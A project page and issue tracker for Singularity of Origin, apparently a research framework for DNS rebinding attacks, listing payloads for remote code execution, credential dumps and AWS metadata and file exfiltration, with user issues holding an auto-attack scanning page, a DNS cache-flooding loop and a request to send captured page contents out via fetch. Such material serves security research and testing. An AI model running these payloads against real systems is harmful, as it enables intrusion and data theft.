
singularity's Introduction

Singularity of Origin


Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

It also ships with sample payloads to exploit several vulnerable software versions, from the simple capture of a home page to performing remote code execution. It aims at providing a framework to facilitate the exploitation of software vulnerable to DNS rebinding attacks and to raise awareness on how they work and how to protect from them.

Detailed documentation is on the wiki pages.

Core Features

  • Singularity provides a complete DNS rebinding attack delivery stack:
    • Custom DNS server to rebind DNS name and IP address
    • HTTP server (manager web interface) to serve HTML pages and JavaScript code to targets and to manage the attacks
    • Several sample attack payloads, ranging from grabbing the home page of a target application to performing remote code execution. These payloads can be easily adapted to perform new and custom attacks.
    • Supports DNS CNAME values in target specification in addition to IP addresses to evade DNS filtering solutions or to target internal resources for which the IP address is unknown.
  • A simple, fast and efficient HTTP port scanner to identify vulnerable services.
  • Attack automation fully automates the scanning and exploitation of vulnerable services on a network.
  • Hook and Control permits using victim web browsers as HTTP proxies to access internal network resources, to interactively explore and exploit otherwise inaccessible applications with your own browser.

Singularity Manager Interface


Hook and Control a Vulnerable Application on Localhost or Other Hosts

Fetch an application home page

Automate the Scan and Compromise of All Vulnerable Applications

Fetch an application home page

Usage

Setting up Singularity requires a DNS domain name where you can edit your own DNS records for your domain and a Linux server to run it. Please see the setup singularity wiki page for detailed instructions.

The documentation is on the wiki pages. Here are a few pointers to start:

A test instance is available for demo purposes at http://rebind.it:8080/manager.html.

Speed

Singularity has been tested to work with the following browsers in optimal conditions in under 3 seconds:

| Browser | Operating System | Time to Exploit | Rebinding Strategy | Fetch Interval | Target Specification |
|---|---|---|---|---|---|
| Chrome | Windows 10 | ~3s | Multiple answers (fast) | 1s | 127.0.0.1 |
| Edge | Windows 10 | ~3s | Multiple answers (fast) | 1s | 127.0.0.1 |
| Firefox | Windows 10 | ~3s | Multiple answers (fast) | 1s | 127.0.0.1 |
| Chromium | Ubuntu | ~3s | Multiple answers (fast) | 1s | 0.0.0.0 |
| Firefox | Ubuntu | ~3s | Multiple answers (fast) | 1s | 0.0.0.0 |
| Chrome | macOS | ~3s | Multiple answers (fast) | 1s | 0.0.0.0 |
| Firefox | macOS | ~3s | Multiple answers (fast) | 1s | 0.0.0.0 |
| Safari | macOS | ~3s | Multiple answers (fast) | 1s | 0.0.0.0 |

Payloads Description

Singularity supports the following attack payloads:

  • Basic fetch request (simple-fetch-get.js): This sample payload makes a GET request to the root directory ('/') using the fetch API and shows the server response. It is meant to serve as an example request, to make additional contributions as easy as possible.
  • automatic: This payload automatically attempts to detect known services and exploit them using other payloads listed in this section or that were developed and added to Singularity by users.
  • Chrome DevTools RCE (exposed-chrome-devtools.js): This payload demonstrates a remote code execution (RCE) vulnerability in Microsoft VS Code fixed in version 1.19.3. This payload can be adapted to exploit any software that exposes Chrome Dev Tools on localhost.
  • Etcd k/v dump (etcd.js): This payload retrieves the keys and values from the etcd key-value store.
  • pyethapp (pyethapp.js): Exploits the Python implementation of the Ethereum client Pyethapp to get the list of owned eth addresses and retrieve the balance of the first eth address.
  • Rails Console RCE (rails-console-rce.js): Performs a remote code execution (RCE) attack on the Rails Web Console.
  • AWS Metadata Exfil (aws-metadata-exfil.js): Forces a headless browser to exfiltrate AWS metadata including private keys to a given host. Check the payload contents for additional details on how to set up the attack.
  • Duplicati RCE (duplicati-rce.js): This payload exploits the Duplicati backup client and performs a remote code execution (RCE) attack. For this attack to work, parameter targetURL in file payload-duplicati-rce.html must be updated to point to a valid Duplicati backup containing the actual RCE payload, a shell script.
  • WebPDB (webpdb.js): A generic RCE payload to exploit PDB, a python debugger exposed via websockets.
  • Hook and Control (hook-and-control.js): Hijack target browsers and use them to access inaccessible resources from your own browser or other HTTP clients. You can retrieve the list of hooked browsers on the "soohooked" sub-domain of the Singularity manager host on port 3129 by default e.g. http://soohooked.rebinder.your.domain:3129/. To authenticate, submit the secret value dumped to the console by the Singularity server at startup.
  • Jenkins Script Console (jenkins-script-console.js): This payload exploits the Jenkins Script Console and displays the stored credentials.
  • Docker API (docker-api.js): This payload exploits the Docker API and displays the /etc/shadow file of the Docker host.
  • Ollama Llama2 Exfil (ollama-exfil.js): Exfiltrate files from hosts running Ollama, an open-source system for running and managing large language models (LLMs). See blog post.

singularity's People

Contributors

0ca, dependabot[bot], gdncc, objectified, sanktjodel


singularity's Issues

Speeding up "First then Second"

Hello,
in the paper "FireDrill: Interactive DNS Rebinding" the authors worked out that DNS Rebinding could be accelerated by flooding the DNS cache of the browser. So instead of waiting for the pinned entries to expire, we can flood the cache with valid entries.
For example, the cache size of the Chrome browser is about 1000 entries. Because of this I integrated the following loop in the payload.js file.

    var i;
    for (i = 0; i < 1000; i++) {
        const url = "http://n" + i + ".rebind.it";
        fetch(url);
    }

With this loop I could perform the "first then second" attack in ~5 seconds. I successfully tested this with Chrome Browser, IP=127.0.0.1 and interval = 1s.

Hook and Control secret value

Hook and Control (hook-and-control.js): Hijack target browsers and use them to access inaccessible resources from your own browser or other HTTP clients. You can retrieve the list of hooked browsers on the "soohooked" sub-domain of the Singularity manager host on port 3129 by default e.g. http://soohooked.rebinder.your.domain:3129/. To authenticate, submit the secret value dumped to the console by the Singularity server at startup.

  • When I copy and paste the temporary secret it does not work. It says authentication failed.

Rebinding failed

Good afternoon

I'm setting up Singularity to play around, but somehow none of the payloads work, I'm wondering if I'm missing something.

Here's my Namecheap setup:

This is the failed rebinding error with any of the payloads:

Server log:

Any tips are greatly appreciated! Thank you.

Cheers

dynamic.your.domain issue

I registered a domain with gandi and configured DNS as follows:

dynamic 1800 IN NS rebinder.MY_DOMAIN.COM
rebinder 1800 IN A MY_VPS_IP

And set up a VM instance with GCP with appropriate UDP and TCP firewall rules.

The problem is, if I use my own address (aka dynamic.MY_DOMAIN.COM) as Attack Host Domain the attack fails because dynamic.MY_DOMAIN.COM can't be resolved. If I look at the traffic in Wireshark I see server failure responses to DNS queries to dynamic.MY_DOMAIN.COM.

If I set d.rebind.it as the Attack Host Domain everything works fine. The HTTP port scanner works flawlessly too.

I have tried with both Debian 9 and Ubuntu 18.04 LTS instances.

I am running singularity-server with default DNS bind settings (0.0.0.0).

How can I solve this?

Singularity server doesn't work on any port other than 8080

Everything works fine when started with this command: sudo ./singularity-server --ResponseIPAddr 1.3.3.7 --HTTPServerPort 8080. However, switching the port with --HTTPServerPort 80 doesn't work. I have 80 open on my VPS.
It ain't possible to DNS rebind on a port without starting Singularity on that same port, is it?

Firewall: 'iptables' finished with error: <nil>

The framework works great when using the rebinding strategy "First then second".
But if I try out the "Multiple answers" strategy, the following error occurs: 'iptables' finished with error: nil
As a result, no firewall rule is created and the requests are not blocked.
Can you give me a hint about what goes wrong?

Hook And Control DNS record broke the script on some providers.

There is an issue with some DNS providers, for example Cloudflare.

Hook and Control requires adding a wildcard (*) A record to yourdomain.com

so ANY.yourdomain.com will resolve to, let's suppose, 163.172.XX.XX
but *.dynamic.yourdomain.com will use the DNS server on 163.172.XX.XX and will switch between that IP and the victim.

Here comes the conflict: when I add the wildcard to Cloudflare and do an NSLOOKUP,

the requests return duplicates with those rules.

The first request will return

C:\Users\Win>nslookup s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Addresses:  163.172.XX.XX
          163.172.XX.XX

The second

C:\Users\Win>nslookup s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Addresses:  163.172.XX.XX
          127.0.0.1

It follows both rules: the wildcard one, which resolves to 163.172.X, and on the second request 10 seconds later, 127.0.0.1

On Windows, it always resolves to 163.172.X.X

On Linux, it doesn't resolve at all.

The possible solution:

Modify 1 or 2 lines in the source to route the sessionid to another subdomain

for example *.dynamic.yourdomain.com for rebinding

and *.tunnel.yourdomain.com

and we add a *.tunnel rule to forward the hostnames to the WS app.

Sadly I am not very familiar with this source and am pretty new to golang

The partial solution that I made is to remove that *, manually add the soohooked A record, and when I want to tunnel to some session I manually add the record to the /etc/hosts file.

I am pretty sure many of us use Cloudflare DNS; standard domain provider DNS is not that flexible and doesn't give free SSL certs, proxies, etc.

Thanks for reading and hope it fixed on a further release.
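
Seen from the resolver side, the second nslookup answer above pairs a public address with 127.0.0.1 for one name. The following is an added defensive example, not part of this issue or of Singularity, that flags that pattern in resolver log records; the record shape, the finding labels, the constructed sample log and the label layout in SESSION_LABEL (inferred from the names quoted on this page) are assumptions.

```javascript
// Added example; not part of Singularity. All sample records are constructed.

// IPv4 ranges that a public DNS name should not resolve to.
const INTERNAL_V4 = [
  ['0.0.0.0', 8],      // unspecified / "this host"
  ['10.0.0.0', 8],
  ['127.0.0.0', 8],    // loopback
  ['169.254.0.0', 16], // link-local
  ['172.16.0.0', 12],
  ['192.168.0.0', 16],
];

// Parse a dotted quad into a number, or null if it is not a valid IPv4 address.
function ipv4ToInt(ip) {
  const parts = String(ip).split('.');
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p); // multiplication avoids 32-bit sign issues
  }
  return n;
}

function isInternalV4(ip) {
  const n = ipv4ToInt(ip);
  if (n === null) return false;
  return INTERNAL_V4.some(([base, bits]) => {
    const start = ipv4ToInt(base);
    return n >= start && n < start + 2 ** (32 - bits);
  });
}

// Assumed layout, inferred from the names quoted on this page:
// s-<first IPv4>-<second IPv4>-<session>-<strategy>-e.<zone>
const SESSION_LABEL =
  /^s-(\d{1,3}(?:\.\d{1,3}){3})-(\d{1,3}(?:\.\d{1,3}){3})-(\d+)-([a-z]+)-e\.(.+)$/i;

function parseSessionName(name) {
  const m = SESSION_LABEL.exec(name.replace(/\.$/, ''));
  if (!m) return null;
  return { first: m[1], second: m[2], session: m[3], strategy: m[4], zone: m[5].toLowerCase() };
}

// Stateful check over records shaped like { name, answers: [ipv4, ...] }.
// localZones lists zones that may legitimately hold internal addresses.
function createRebindWatch(localZones = []) {
  const seenPublic = new Set(); // names that have already returned a public address
  const isLocalName = (n) => localZones.some((z) => n === z || n.endsWith('.' + z));

  return function inspect(record) {
    const name = record.name.toLowerCase().replace(/\.$/, '');
    const findings = [];
    if (isLocalName(name)) return findings;

    const internal = record.answers.filter(isInternalV4);
    const external = record.answers.filter((a) => ipv4ToInt(a) !== null && !isInternalV4(a));

    if (internal.length && external.length) {
      findings.push('mixed-public-and-internal-answers'); // one response, both kinds
    } else if (internal.length && seenPublic.has(name)) {
      findings.push('public-then-internal');              // answer changed over time
    } else if (internal.length) {
      findings.push('internal-answer-for-external-name');
    }

    const parsed = parseSessionName(name);
    if (parsed && isInternalV4(parsed.second)) findings.push('internal-address-embedded-in-name');

    if (external.length) seenPublic.add(name);
    return findings;
  };
}

// Constructed resolver log (documentation addresses and .test names).
const SAMPLE_LOG = [
  { name: 'www.example.test', answers: ['203.0.113.80'] },
  { name: 's-203.0.113.10-127.0.0.1-1234567-ma-e.dynamic.example.test',
    answers: ['203.0.113.10', '127.0.0.1'] },
  { name: 'n1.rebind.example.test', answers: ['203.0.113.10'] },
  { name: 'n1.rebind.example.test', answers: ['192.168.1.48'] },
  { name: 'printer.corp.example.test', answers: ['192.168.1.48'] },
];

// Return only the records that produced at least one finding.
function scanSample() {
  const inspect = createRebindWatch(['corp.example.test']);
  return SAMPLE_LOG
    .map((r) => ({ name: r.name, findings: inspect(r) }))
    .filter((r) => r.findings.length > 0);
}

console.log(JSON.stringify(scanSample(), null, 2));
```

Resolvers with built-in rebinding protection apply the same idea at answer time by dropping internal addresses returned for external names.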

Suggestion !!

I'm a huge follower of you guys.
Your Singularity DNS rebinding tool is such an amazing tool. I just tried to set it up on my own, but I terribly failed and got errors at each step.
The only thing that I wanted to do is make a "fetch" API request instead of showing an "alert" of the result, exactly at https://github.com/nccgroup/singularity/blob/4744064e35cd6a3759630868d6a21597faf73234/html/manager.js in line "574"

instead of making

alert('Target home page contents:\n' +msg.data.response);

just make it

fetch(url+msg.data.response); 

and add an HTML/JS page to manage the content receiver URL.
Please, if you don't mind, make this change and apply it at http://rebind.it:8080/,

I tried to host it on my own and, as I previously said, I faced a lot of errors.
I don't want to disrespect you (I don't mean that at all), but I'd help with money if it's required.

And thanks for time and your great research & services
Please do not ignore

{"ServerInformation":[{"Port":"80"}],"AllowDynamicHTTPServers":false}

I have a problem... and I added the dot but it's not a success..
and that happened when local target or public >> I'm the local and public ...
root@kali:~/singularity# ./singularity-server --HTTPServerPort 80 --ResponseIPAddr 192.168.1.5 --ResponseReboundIPAddr 192.168.1.6
Temporary secret: d4c7b6ea906748c73d054dab7de931b304250dda
2020/01/05 23:50:12 Main: Starting DNS Server at 53
2020/01/05 23:50:12 HTTP: starting HTTP Server on :80
2020/01/05 23:50:12 HTTP: starting HTTP Websockets/Proxy Server on :3129
2020/01/05 23:50:39 HTTP: GET / from [::1]:52888
2020/01/05 23:50:41 HTTP: GET /manager.html from [::1]:52890
2020/01/05 23:50:41 HTTP: GET /manager.js from [::1]:52892
2020/01/05 23:50:41 HTTP: GET /servers from [::1]:52894
{"ServerInformation":[{"Port":"80"}],"AllowDynamicHTTPServers":false}
2020/01/05 23:50:41 HTTP: GET /manager-config.json from [::1]:52896

DNS Rebinding is too Slow

Instead of abusing the TTL on DNS entries, why not have two IPs for one A record?

The way that browsers work is, if the first A record fails to connect, the application will fall back to the next IP. This in theory would allow you to instantly do DNS rebinding without having to worry about any silly browser caching.

Parsed query error: <nil>

Hello,

I have set up a DNS domain (called MYDOMAIN.COM) on Gandi.net and a Singularity server in Azure (Red Hat 8.1) called SINGULATITY_SERVER_IP.
I have added the required entries to Gandi.net DNS and opened UDP 53 and TCP 80 ports on the Singularity server.
In my local network, I have a printer which provides a web page for management, available in my local network under IP address 192.168.1.48.
I am able to access the printer web page without authentication from my laptop (in the same local network). The curl command also gets results when I query the printer web page from the laptop.
I have made tests with the connection to the Singularity server and all seems to be OK.
Unfortunately none of the payloads work :(
I am running them on my laptop on macOS and I have also tried on a Windows VM.
From the Singularity server I am receiving these logs when using the "Simple Fetch Get" payload and "First and second" strategy.
screen with error

It should work, but it doesn't. Where might the problem be?
Thank you for any help

But how can this be used to exploit a router in real life?

Let's say that the pass and username are admin.admin
How will the DNS rebinding connect to the router page and enable remote access, send us the WiFi password, etc.?
Is there a video tutorial that one can follow?!

Initial "Go Get" command does not create ~/go/src/github.com/nccgroup/singularity/cmd/singularity-server

Hello.

A student contacted me requesting help setting up a Singularity server. I spun up a Debian 10 VM to try this out before we meet tonight.

After installing go and after installing the specified packages, there is no folder to cd into as suggested by the setup instructions.

   go get -v github.com/nccgroup/singularity
   go get -v github.com/gorilla/mux
   go get -v github.com/gorilla/websocket
   go get -v github.com/gorilla/securecookie
   cd ~/go/src/github.com/nccgroup/singularity/cmd/singularity-server
   -bash: cd: /root/go/src/github.com/nccgroup/singularity/cmd/singularity-server: No such file or directory

This tool seems interesting, but I am unable to proceed with the installation past this point and won't be able to assist my student further as a result. I've informed them to inform their professor that the instructions might be out-of-date (as it appears).

Were someone to want to proceed forward on a new box, how might we go about doing this?

Origin check fails when using port 80

There is a bug on the origin definition on FrameManager on manager.js.

    const origin = (url) => {
        //Does not work in IE11. 
        //const u = new URL(url); 
        // Workaround:
        let u = document.createElement('a');
        let id = Math.random().toString();
        u.setAttribute('href', url);
        u.setAttribute('id', id);
        const o = `${u.protocol}//${u.hostname}:${u.port}`; // <---- HERE
        u.remove();
        return o;
    };

u.port would be empty if the port is 80 (because browsers remove it from a url when using 80). That would cause the origin to be "example.com:" instead of "example.com"

Change that line for:

const o = u.port ? `${u.protocol}//${u.hostname}:${u.port}`: `${u.protocol}//${u.hostname}`;

By the way, great tool, thank you!
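
The default-port case described in this issue, as an added example that is not code from manager.js: it uses the standard URL class instead of the anchor-element workaround so it runs outside a browser (both expose the same protocol, hostname and port properties). The sample URLs are constructed, and findOriginMismatches and acceptsMessage are hypothetical helpers.

```javascript
// Added example; not code from manager.js. URLs below are constructed.

// Same string construction as the line marked HERE in the issue:
// the port is always appended, even when the browser reports it as ''.
function originAlwaysWithPort(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.hostname}:${u.port}`;
}

// Same construction as the replacement line proposed in the issue:
// the ":port" suffix is dropped when the port is empty (scheme default).
function originOmittingEmptyPort(url) {
  const u = new URL(url);
  return u.port
    ? `${u.protocol}//${u.hostname}:${u.port}`
    : `${u.protocol}//${u.hostname}`;
}

// Compare a hand-built origin with the standard serialization that browsers
// use for location.origin and MessageEvent.origin; return the disagreements.
function findOriginMismatches(urls, originFn) {
  return urls
    .map((url) => ({ url, built: originFn(url), standard: new URL(url).origin }))
    .filter((r) => r.built !== r.standard);
}

// Hypothetical origin gate: accept a message only if the origin reported by
// the browser equals the origin computed for the expected frame URL.
function acceptsMessage(expectedUrl, eventOrigin, originFn) {
  return originFn(expectedUrl) === eventOrigin;
}

const SAMPLE_URLS = [
  'http://rebinder.example.test/manager.html',      // no port given
  'http://rebinder.example.test:80/manager.html',   // explicit default port
  'http://rebinder.example.test:8080/manager.html', // non-default port
  'https://rebinder.example.test:443/',             // https default port
  'http://[::1]:3129/',                             // IPv6 literal keeps its brackets
];

// Every URL on a scheme-default port ends in a bare ':' with the first function.
console.log(findOriginMismatches(SAMPLE_URLS, originAlwaysWithPort));
// The proposed line agrees with the standard serialization for all samples.
console.log(findOriginMismatches(SAMPLE_URLS, originOmittingEmptyPort));
```

The same empty-port behaviour applies to https on 443, so a check that special-cases only port 80 would still fail there; testing for an empty port string covers both.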

problem getting rebinding to work

Hi,
I've followed all the instructions from the wiki, and I managed to get the server running.
Now, the issue I've been facing is that issuing host to d.mydomain.tk keeps getting me my ip address instead of expected my ip address and 127.0.0.1 , and testing your demo version I see that this(my example):
s-my.ip.add.ress-127.0.0.1-158903359-ma-e.d.mydomain.tk should resolve to both my ip address and 127.0.0.1 in different order with each request as in rebinding in action, but instead
Host s-my.ip.add.ress-127.0.0.1-158903359-ma-e.d.mydomain.tk not found: 2(SERVFAIL)

I am using digitalocean vps so I was wondering if that may be the cause.

My setup is as follows (note that for NS rebinder.mydomain.tk can't be saved with the ending . for some reason, and I have been messing around with TTL values to see if that would help somehow):

A | *.mydomain.tk | directs to 206.189.179.65 | 30 TTL
A | rebinder.mydomain.tk | directs to 206.189.179.65 | 30 TTL
NS | dynamic.mydomain.tk | directs to rebinder.mydomain.tk | 60 TTL
NS | mydomain.tk | directs to ns1.digitalocean.com. | 1800 TTL
NS | mydomain.tk | directs to ns2.digitalocean.com. | 1800 TTL
NS | mydomain.tk | directs to ns3.digitalocean.com. | 1800 TTL

The other issue is that issuing:
host dynamic.mydomain.tk
also fails
but issuing:
host rebinder.mydomain.tk
my.ip.add.ress

And I have tried this as well in order to verify if it's working as it's supposed to (from https://github.com/nccgroup/singularity/wiki/Setup-and-Installation#on-the-dns-registrar-web-management-interface):
This sample setup informs DNS clients, including browsers, that "ip.ad.dr.ss" answers queries for any subdomains under ".dynamic.your.domain.", e.g. "foo.dynamic.your.domain."

but it fails.

I have also had trouble figuring out this(from https://github.com/nccgroup/singularity/wiki/Setup-and-Installation#on-the-dns-registrar-web-management-interface):
A Name: "rebinder", IPv4: "ip.ad.dr.ss". -- ok, this makes sense, it's very straightforward.
NS Name: "dynamic", Hostname: "rebinder.your.domain.". Note that the ending dot "." in the hostname is required. -- this one is confusing when looked at the:
https://cloud.digitalocean.com/networking/domains/mydomain.tk

where there is NS area, but it looks like this:
Field 1 asks for @ (which simply leaves the value mydomain.tk) or to specify hostname (which expects one word and then it saves it as oneword.mydomain.tk) and the second field is Directs to which expects my.ip.add.ress or a complete hostname (ie rebinder.mydomain.tk.) and for some hostnames/ip addresses it saves with . at the end automatically and for others it removes the added dot (.)

So, I've been trying to direct things all over the place to get it working but the most I got was everything resolving to only my.ip.add.ress instead of going between my.ip.add.ress and 127.0.0.1 as it's supposed to.

This is a lot to ask, but I've tried other rebinding frameworks that flat out don't work and they don't require any dns configuration so I have no idea what to do with those or what questions to ask, so I'd appreciate any pointer in the right direction for dns configuring that pertains to dns rebinding, googling anything about dns rebinding tends to show theory or tools without links to tools, or tools don't work but sound great with regards to not requiring any setup other than editing a js or html file.

Thanks for the effort in making this framework and hopefully my question has a simple and quick answer :)

Sincerely,
@musashi42

autoattack.html trying to fetch soopayload.html on target

Hi,

I tried to test my simple python app on port 8080 on localhost.
I own a domain and subdomain for this attack.
When I try to load the URL http://rebind.mydomain/autoattack.html, the DNS rebinding is working but the simple payload tries to fetch my simple Python service with GET /soopayload.html, which leads to a 404...
I set up my config following this video:
https://www.youtube.com/watch?v=R5Y1luRhjbc

<!doctype html>
<html lang="en">
<head>
    <title>Singularity of Origin DNS Rebinding Automatic Attack</title>
    <script src="manager.js"></script>
    <script src=scan-manager.js></script>
    <meta charset="utf-8">
    <meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
    The home page of vulnerable services will be dumped in the browser developer console.
    <script>
        const configuration = {
            attackHostIPAddress: 'X.X.X.X', //my singularity web server 
            attackHostDomain: 'dynamic.mydomain', //which is NS entry 
            rebindingStrategy: 'ma',
            attackPayload: 'Simple Fetch Get',
            interval: "1",
            flushDns: false,
            indexToken: "<!--thisismytesttoken-->",
            wsProxyPort: 3129,
            hideActivity: false,
            delayDOMLoad: false,
        };
        configuration.rebindingSuccessFn = (msg) => {
            console.log(`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`);
        }
        app.getConfiguration().setManually(configuration);
        let addrSpec = `0.0.0.0`; // this is a Linux Host
        let searchForMoreAddresses = false;
        const portSpec = '8080'; // python simple server port
        function scanFoundNewTargetCb(result) {
            console.log(result);
            document.getElementById("activity").innerHTML += JSON.stringify(result, null, 4) + "<br/>";
            app.attackTarget(result.target.address.replace("-", "--"), result.target.port, true);
        }
        function scanDoneCb(results) {
            document.getElementById("activity").innerHTML += "Done.<br/>";
            setTimeout(function () {
                sm.shutDown();
            }, 3000);
            setTimeout(function () {
                delaydomloadframe.src = "about:blank";
            }, 90000);
        }
        async function getLocalIpAddressesThenScan() {
            sm = ScanManager();
            const externalAddress = await getMyExternalIpAddress();
            addrSpec = `${addrSpec},${externalAddress}`;
            getLocalIpAddress()
                .then(address => {
                    const range = `${address.split('.', 3).join('.')}.1-254`;
                    sm.run(`${addrSpec},${range}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                },
                    e => {
                        console.log(e);
                        sm.run(`${addrSpec},192.168.1.1-254`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                    })
        }
        if (searchForMoreAddresses === true) {
            getLocalIpAddressesThenScan();
        } else {
            sm = ScanManager();
            sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
        }
    </script>
    <h3>Scanning Progress</h3>
    <div id="activity"></div>
    <h3>DNS Rebinding Progress</h3>
    <div id=attackframes></div>
    <iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>

And this is the output of my Python server:

127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -

Failing to compile: "undefined: net.ListenConfig"

Hi there,

I'm running into an error when attempting to compile singularity-server

Steps Taken

  1. go get -v github.com/nccgroup/singularity
  2. cd ~/go/src/github.com/nccgroup/singularity/cmd/singularity-server
  3. go build

Output:

# github.com/nccgroup/singularity
../../singularity.go:797:20: undefined: net.ListenConfig

I'm on a fresh Ubuntu 18.04.4 VPS with Golang 1.10.4 installed. Any tips would be greatly appreciated!

DNS rebinding failed on Ubuntu 20.04.1 LTS

image

OS: Ubuntu 20.04.1 LTS

I used the default version (79.0) of Firefox at first, and then I tried to upgrade Firefox to the latest version (95.0.1), but it failed.

It seems that the local service is directly accessed, and it is a 404 directly.

I tried 127.0.0.1 again and it failed

Namecheap does not allow for A records with host names ending in a period

After overcoming the previous issue and getting Singularity successfully installed, I've run into another problem in the setup instructions, this time with the DNS registration itself.

I have not checked Gandi, but Namecheap, at least, does not allow me to register an A record with host name of type "rebinder.myhost.com." (with the ending period). It states that it is an invalid host name.

I've messaged namecheap about this limitation and am waiting to hear back about it. I assume they disabled it for security reasons. Is there a reason that the ending period is required? I'm sure there is, but since they do not allow me to set that up, perhaps I could know more behind why it is required while I wait for them to explain why they disabled that to begin with?

Option to support all ports via tproxy

Currently, singularity has to be configured with ports at startup or be configured to dynamically bind to ports with the "dangerously allow request ports" option.

If you have a dedicated IP address for Singularity on the machine, it may be possible to use the tproxy module in Linux along with the SO_TRANSPARENT socket option to redirect incoming connections on all ports for that IP to Singularity.

Cloudflare has a great blog post on how to accomplish this.

Alternatively, if Singularity supported the PROXY protocol, users could set up this trick and forward traffic to Singularity with the original/port available in headers sent to the application

SOP, Blocked requests

Hi.

Files:

imagen

imagen

imagen

imagen

It's okay. The router / gateway HTTP server has iframes protection enabled.

But why can't I connect via AJAX connection?

I have inserted in the code of the file manager.html jQuery and the function get()

imagen

However:

imagen

imagen

What is the problem?

Thank you!

Attack has been blocked by CORS policy

Hi @gdncc and congratulations on the tool you made. I am trying to perform the attack on my home router and I cannot understand why it is giving me this error.

Screenshot from 2021-09-25 18-00-32

I tried another router on a different line and the attack was successful.

Could you help me understand why it doesn't work on this router? or what caused the error.

Sorry for my English.

Exploit without iframes

Thanks for the amazing tool and research!
I have a strange website vulnerable to Blind SSRF and I see the application is using HeadlessChrome to make the requests and the backend is hosted on GCP.
Doing some simple tests I noticed the application seems to filter or block iframes when HeadlessChrome is loading the response.
I'd like to know if it's possible to have a minimal payload without iframes with a minimum javascript code.

Regards
Ricardo Iramar

How to install SSL certificate?

Does Singularity support sending the traffic via SSL encryption? In that case, how do I install the Let's Encrypt certificate and enable HTTPS?

Or any other alternative

Configuration (Google cloud + gandi)

Hello:

In this link: https://github.com/nccgroup/singularity/wiki/Setup-and-Installation. You indicate that gandi or namecheap is used. And a Linux instance of some of these: Linode, Amazon AWS, Google Cloud, Microsoft Azure etc.

I understand that you have tried any of these combinations.

In my case I have tried with gandi and with Google Cloud and Azure. But I cannot connect an external machine with the instance through the DNS protocol (53).

I have Ubuntu 18 installed on the VM. And I have disabled the systemd-resolved service as indicated in the documentation.
image

I have allowed inbound traffic for all protocols. But I cannot connect through UDP port 53.

image

The connection is established through: nc local_ip 53 -u. It is as if the Azure / google Cloud firewall filters or uses port 53.

Any idea how to fix this? Have you done it?

My /etc/resolv.conf file:

nameserver 8.8.8.8
options edns0
search europe-west4-b.c.handy-zephyr-275214.internal c.handy-zephyr-275214.internal google.internal

I understand that the domain server can only communicate with the instance through port 53, which I cannot change. Do NAT type 5353 -> 53

Regarding the domain configuration, you would only have to modify this, is that so?

image

For this:

@ 10800 IN SOA ns1.gandi.net. hostmaster.gandi.net. 1554761168 10800 3600 604800 10800
@ 3600 IN A VM_IP
d 1800 IN NS nettinghack.site.
* 1800 IN A VM_IP

Thanks a lot!
